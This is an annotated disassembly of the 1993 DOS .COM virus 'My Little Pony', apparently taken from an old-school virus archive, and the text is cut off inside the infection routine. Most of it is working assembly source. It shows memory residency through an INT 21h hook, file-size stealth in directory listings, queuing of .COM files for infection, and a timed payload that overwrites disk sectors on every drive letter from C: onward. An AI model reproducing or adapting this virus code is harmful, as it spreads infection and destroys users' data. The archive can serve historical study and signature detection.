
📄 mlp1307b.asm

📁 More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use
;My Little Pony v1.00 disassembly - sort of.
;By Cruel Entity of ANOI. Related to CyberCide.

;Well, the comments are a bit bitchy, probably coz I was in a really
;really bad mood when I wrote them. The virus author, Cruel Entity,
;knows how to make a nice virus, he just doesn't have enough assembly
;experience to make something really worth while, imho of course.

;Bummer: Still some loc_xxx's left, hrmpf, I won't care if you don't.

;Just dump this one in your misc. garbage area dude.. :-)
		
		.model tiny

		.code

		org     100h

;-----------------------------------------------------------------------
;start - entry stub that runs when an infected .COM host is executed.
;Analysis notes (16-bit DOS real mode, COM image loaded at CS:100h):
; - CALL/POP BP recovers the run-time address of get_relative, so every
;   data reference below is written as [bp+label-get_relative].
; - Residency probe: INT 21h with AX=0DD22h; a resident copy answers
;   AX=3D33h (see inst_chk). The same probe identifies an active copy
;   in memory during analysis.
; - When not resident: saves the INT 21h vector, lowers the host's MCB
;   size and the word at MCB:12h by 'parasize' paragraphs, copies
;   'virussize' bytes to the freed segment at offset 100h and points
;   INT 21h at 'int21' in that segment.
; - Both paths end in restore_carrier, which copies the 3 saved host
;   bytes back to 100h and jumps there.
;The byte layout is position dependent (hand-encoded LEA, [bp-3]).
;-----------------------------------------------------------------------
start:
		call    get_relative
get_relative:                
		pop     bp                      ;BP = run-time offset of get_relative.
		
		mov     ax,0DD22h
		int     21h                     ;Installation check.
		cmp     ax,3D33h                ;3D33h = reply of a resident copy.
		jne     not_installed

;The three bytes below are the hand-encoded form of the LEA shown in the
;next comment line, with the displacement fixed at 52h.
;*              lea     dx, [bp+restore_carrier-get_relative]                
		db      08dh, 56h, 52h
		
		jmp     dx                      ;Already resident: only restore host.

not_installed:
		mov     ax,3521h
		int     21h                     ;Get int21 vector
		
		mov     [bp+int21offset-get_relative],bx
		mov     [bp+int21seg-get_relative],es        ;Store it.

		mov     ax,cs
		dec     ax
		mov     es,ax                   ;ES:0 points to MCB.

		mov     ax,es:[3]
		sub     ax,[bp+parasize-get_relative]
		mov     es:[3],ax               ;Shrink blocksize.

		mov     ax,[bp+parasize-get_relative]
		sub     es:[12h],ax             ;Free top mem.
						;(MCB:12h is the same word
						;as CS:2 in the host's PSP.)
		
		mov     es,es:[12h]             ;ES = segment just freed.
		push    es
		lea     si,[bp-3]               ;SI points to start of
						;virus.
						;(BP-3 because the CALL at
						;start is 3 bytes long.)
		mov     di,100h
		mov     cx,[bp+virussize-get_relative]
		rep     movsb                   ;Copy virus up there.
		
		pop     ds                      ;DS = resident segment.
		
		mov     ax,2521h
		mov     dx, offset int21
		int     21h                     ;Set new int21 vector.
		
restore_carrier:                
		push    cs
		push    cs
		pop     ds
		pop     es                      ;DS = ES = host segment.
		lea     si,[bp+restore_bytes-get_relative]
		mov     cx,3
		mov     di,100h
		rep     movsb                   ;Restore host.
		sub     di,3                    ;DI back to 100h.
		jmp     di                      ;Restart host.

;Embedded text, not reached by execution (the JMP above never falls
;through). Usable as a static identification string.
db      'Simple Simon met a pieman going to the fair said Simple Simon to '
db      'the pieman let me take your ware'

;-----------------------------------------------------------------------
;activate - destructive payload trigger, entered from int21 when the DOS
;clock poll there returned minutes (CL) == 0.
;In:    DH = seconds, DL = hundredths (from INT 21h AH=2Ch).
;       Stack holds the flags, AX, CX and DX pushed by int21.
;Runs only when seconds == 0 and hundredths <= 5. It then issues
;INT 26h (absolute disk write) for drive numbers 2 through 24 with
;CX = 1 sector, DX = get_random result / 10 and BX = offset anoi.
;DS is not loaded here. get_random and anoi are defined outside this
;part of the listing.
;Exit:  jumps to no_activate, which pops the DX/CX/AX saved by int21.
;-----------------------------------------------------------------------
activate:
		cmp     dh,0                    ;Seconds 0?
		jne     no_activate
		cmp     dl,5                    ;Hundredths 5 or less?
		ja      no_activate

		pushf
		push    bx
		call    get_random

		mov     cx,0Ah
		xor     dx,dx
		div     cx                      ;AX = random value / 10.
		mov     dx,ax                   ;DX = starting sector number.
		mov     al,2                    ;AL = drive number, 2 = C:.
		mov     cx,1                    ;One sector per write.
		mov     bx,offset anoi
kill_sector:
		int     26h                     ;Sector write.
		
		popf                            ;INT 26h leaves its flags word
						;on the stack; discard it.
		inc     al                      ;Next drive number.
		
		cmp     al, 25
		jne     kill_sector

		pop     bx
		popf
		jmp     short no_activate
		
		;Embedded text, not executed; static identification string.
		db      '(c)1993 Cruel Entity'
		
;-----------------------------------------------------------------------
;int21 - resident INT 21h hook (dispatcher).
;Pushes the flags, then routes on AX/AH:
;  AX=0DD22h  -> inst_chk           residency probe, answers AX=3D33h
;  AH=11h/12h -> fcb_stealth        FCB find first / find next
;  AH=4Eh/4Fh -> go_handle_stealth  handle find first / find next
;  AH=3Dh     -> go_file_open
;  AH=3Eh     -> go_file_close
;  AH=2Ch     -> get_time           skips the clock poll below
;Every other function first polls the DOS clock with AH=2Ch; when the
;minutes value in CL is 0 control goes to activate. Afterwards AH=36h
;continues at loc_20 and everything else is chained to the saved
;vector through pass_int.
;pass_int is a far-JMP opcode byte (0EAh) whose 4-byte operand is
;int21offset/int21seg, filled in by the installer at start.
;handle_stealth, file_open and file_close are outside this part of the
;listing.
;-----------------------------------------------------------------------
int21:                
		pushf
		cmp     ax, 0dd22h
		jz      inst_chk
		cmp     ah,11h
		jz      fcb_stealth
		cmp     ah,12h
		jz      fcb_stealth
		cmp     ah,4eh
		jz      go_handle_stealth
		cmp     ah,4fh
		jz      go_handle_stealth
		cmp     ah,3dh
		jz      go_file_open
		cmp     ah,3eh
		jz      go_file_close
		cmp     ah,2ch
		jz      get_time

		push    ax
		push    cx
		push    dx
		mov     ah, 2ch                 ;Get DOS time.
		int     21h                     ;Re-enters this hook with
						;AH=2Ch, which is passed on.

		cmp     cl,0                    ;Minutes == 0?
		jz      activate

no_activate:
		pop     dx
		pop     cx
		pop     ax

get_time:
		cmp     ah,36h                  ;Get free disk space?
		jne     _pass_int
		
		push    bp                      ;loc_20 pops this BP first.
		mov     bp,offset loc_20
		jmp     bp
_pass_int:                
		popf                            ; Pop flags
pass_int:                
		db      0eah                    ;JMP FAR opcode; operand follows.
int21offset     dw      0
int21seg        dw      0

;-----------------------------------------------------------------------
;go_handle_stealth / go_file_open / go_file_close - trampolines used by
;the int21 dispatcher. Each saves BP, loads the target offset into BP
;and does a near indirect JMP through it, so the target starts with the
;caller's BP on top of the stack (above the flags pushed by int21).
;The three targets are outside this part of the listing.
;Presumably needed because the targets are out of short-jump range of
;the JZ instructions in int21 - confirm against the full file.
;-----------------------------------------------------------------------
go_handle_stealth:
		push    bp
		mov     bp,offset handle_stealth
		jmp     bp

go_file_open:
		push    bp
		mov     bp,offset file_open
		jmp     bp
go_file_close:
		push    bp
		mov     bp,offset file_close
		jmp     bp

;-----------------------------------------------------------------------
;inst_chk - reply to the residency probe (INT 21h, AX=0DD22h).
;Drops the flags pushed by int21 and returns AX=3D33h to the caller
;with IRET; the request is not passed on to DOS.
;This request/reply pair is the in-memory indicator checked at start.
;-----------------------------------------------------------------------
inst_chk:                
		popf
		mov     ax,3D33h
		iret

;-----------------------------------------------------------------------
;call_dos - pass control to the saved (original) INT 21h vector.
;Far indirect JMP through cs:int21offset/int21seg. fcb_stealth reaches
;it with PUSHF / PUSH CS / near CALL, which leaves a flags-CS-IP frame
;on the stack, so the original handler's IRET returns to that caller.
;The 0C3h byte is a RET opcode placed after the unconditional JMP; it
;is not reached by falling through.
;-----------------------------------------------------------------------
call_dos:
		jmp     dword ptr cs:[int21offset]
		db      0C3h

;-----------------------------------------------------------------------
;fcb_stealth - size stealth for FCB directory searches (AH=11h/12h).
;Lets DOS perform the search first, then inspects the result in the DTA:
; - AL=0FFh (no match): return to the caller unchanged.
; - extension is not COM, or the word at DTA+26h is non-zero: no change.
; - (time word at DTA+1Eh AND 1Fh) == 0Ah: subtract cs:virussize from
;   the size word at DTA+24h, so a directory listing shows the smaller
;   size. This bit test is what selects files for size hiding.
; - otherwise: go to loc_17, which records the file name for later.
;Returns with RETF 2, i.e. the caller's saved flags word is discarded.
;NOTE(review): for an extended-FCB search DOS returns in the DTA a
;7-byte extended header, a drive byte and then the 32-byte directory
;entry. Relative to BX that gives +08h name, +10h extension, +1Eh time
;word and +24h/+26h low/high word of the file size. Read that way the
;+26h test means "size below 64K" and the marker is the seconds field
;of the time stamp (value 0Ah, i.e. :20). Some inline remarks by the
;original annotator read these offsets differently - confirm.
;-----------------------------------------------------------------------
fcb_stealth:                
		popf                            ;Drop flags pushed by int21.
		pushf
		
		push    cs
		call    call_dos                ;First let's see what
						;DOS has to say..

		cmp     al,0FFh                 ;0FFH indicates
						;no match found
		je      exit_fcb_stealth
match_found:
		pushf
		push    ax
		push    bx
		push    cx
		push    dx
		push    si
		push    di
		push    ds
		push    es
		push    bp                      ;Push the lot.
		
		mov     ah,2Fh
		int     21h                     ;Get DTA
		
		push    es
		pop     ds                      ;DS:BX points to DTA.

		mov     si,bx                   ;DS:SI points to DTA.
		
		add     si,10h                  ;SI points to extension.
						;<EXTENDED FCB ONLY!>

						;(lamer)
		
		lodsw
		cmp     ax,'OC'                 ;Extension starts with CO?
		jne     no_fcb_stealth

		lodsb
		cmp     al,'M'                  ;Last char M?
		jne     no_fcb_stealth

		mov     si,bx
		add     si,26h                  ;I don't mean to sound
						;bitchy, but IMO,
						;ADD SI, 13h would've
						;been what normal persons
						;would've done.

						;Offset 26h is a reserved
						;position within an
						;extended FCB.

						;<INFECTION MARK>

						;NOTE(review): see header;
						;+26h may be the high word
						;of the file size instead.

		lodsw
		cmp     ax,0                    ;OR AX,AX? Naaaah!
		jne     no_fcb_stealth

		mov     si,bx
		add     si,1Eh                  ;offset 1eh is the high
						;byte of file time.
						;NOTE(review): LODSW reads a
						;word and only AL (its low
						;byte) is tested - confirm.
		lodsw
		and     al,1Fh                  ;Keep the low five bits.
		cmp     al,0Ah
		je      proceed_fcb_stealth

		mov     dx,offset loc_17        ;No marker: queue the name.
		jmp     dx
proceed_fcb_stealth:                
		mov     si,bx
		add     si,24h                  ;If I remember correctly,
						;this is an undocumented
						;copy of the filesize within
						;the FCB structure. THIS
						;is the value that is
						;printed in a dir listing.
		
		mov     di,si                   ;ES:DI = same word (ES still
						;holds the DTA segment).
		lodsw
		sub     ax,cs:virussize         ;Hm, I can't seem to figure
		jz      no_fcb_stealth          ;out if this guy is just
		stosw                           ;stupid or ignorant when it
						;comes to asm.
no_fcb_stealth:
		pop     bp
		pop     es
		pop     ds
		pop     di
		pop     si
		pop     dx
		pop     cx
		pop     bx
		pop     ax
		popf

exit_fcb_stealth:
		retf    2

;Embedded text, not executed; static identification strings.
db      '%%% MY LITTLE PONY %%% '
db      'COPYRIGHT(C) 1993 A.N.O.I. %%%'

;-----------------------------------------------------------------------
;loc_17 - record a file name found by fcb_stealth.
;Reached from fcb_stealth for a COM entry that passed the +26h test but
;does not carry the 0Ah marker value.
;In:    DS:BX = DTA (set up in fcb_stealth).
;Scans up to 0Ah slots of 8 bytes starting at cs:something for one
;whose first byte is a space and copies the 8 bytes at DTA+8 into it.
;If no such slot is found nothing is stored. Both paths return through
;no_fcb_stealth. 'something' is defined outside this part of the listing.
;-----------------------------------------------------------------------
loc_17:
		mov     si,bx
		add     si,8                    ;DS:SI = 8 bytes at DTA+8.
		push    cs
		pop     es                      ;ES = resident segment.
		mov     cx,0Ah                  ;Number of slots to test.
		mov     di,offset something

locloop_18:
		cmp     byte ptr es:[di],' '    ;Slot starts with a space?
		je      loc_19
		add     di,8                    ;Next 8-byte slot.
		loop    locloop_18

		jmp     short no_fcb_stealth    ;No free slot: give up.
loc_19:
		mov     cx,8
		rep     movsb                   ;Copy the 8 bytes into the slot.
		jmp     short no_fcb_stealth

;-----------------------------------------------------------------------
;loc_20 - handler for INT 21h AH=36h, reached through the BP trampoline
;at get_time. Works through the names recorded by loc_17.
;Restores BP, saves the registers, sets DS = ES = CS and walks the
;8-byte slots at 'something' (at most 0Ah of them), calling try_infect
;with SI = slot until a slot starting with a space is met.
;loc_22 then fills 5Ch bytes from 'something' with spaces, restores the
;registers, pops the flags pushed by int21 and chains the original
;request to DOS through pass_int.
;NOTE(review): 5Ch bytes is more than the 0Ah*8 bytes walked above;
;what follows the slots is not visible in this part of the listing.
;-----------------------------------------------------------------------
loc_20:
		pop     bp                      ;BP pushed by the trampoline.
		push    ax
		push    bx
		push    cx
		push    dx
		push    si
		push    di
		push    ds
		push    es
		push    bp                      ;Push some regs.

		push    cs
		push    cs
		pop     ds
		pop     es                      

		mov     di,offset something
		mov     cx,0Ah

locloop_21:
		cmp     byte ptr [di],' '       ;Space = end of recorded names.
		je      loc_22
		push    di
		push    cx                      ;try_infect uses CX and DI.
		mov     si,di                   ;SI = recorded 8-byte name.
		call    try_infect
		pop     cx
		pop     di
		add     di,8
		loop    locloop_21

loc_22:
		push    cs
		pop     es
		mov     di,offset something
		mov     cx,5Ch
		mov     al,' '
		rep     stosb                   ;Blank the name area.
		pop     bp
		pop     es
		pop     ds
		pop     di
		pop     si
		pop     dx
		pop     cx
		pop     bx
		pop     ax
		popf                            ;Flags pushed at int21 entry.
		jmp     pass_int                ;Let DOS serve the AH=36h call.

try_infect:                                     ;JESUS! It's actually
						;a subroutine!!

						;He knows what a sub
						;IS!! Wow! I'm shocked!
		mov     di,offset filename
		mov     cx,8

copyloop2:
		lodsb
		cmp     al,' '
		je      endcopy2
		stosb
		loop    copyloop2
endcopy2:
		
		mov     al,'.'
		stosb
		mov     al,'C'
		stosb
		mov     al,'O'
		stosb
		mov     al,'M'
		stosb
		mov     al,0
		stosb 

		push    cs
		pop     ds
		
		mov     ax,4300h
		mov     dx,offset filename
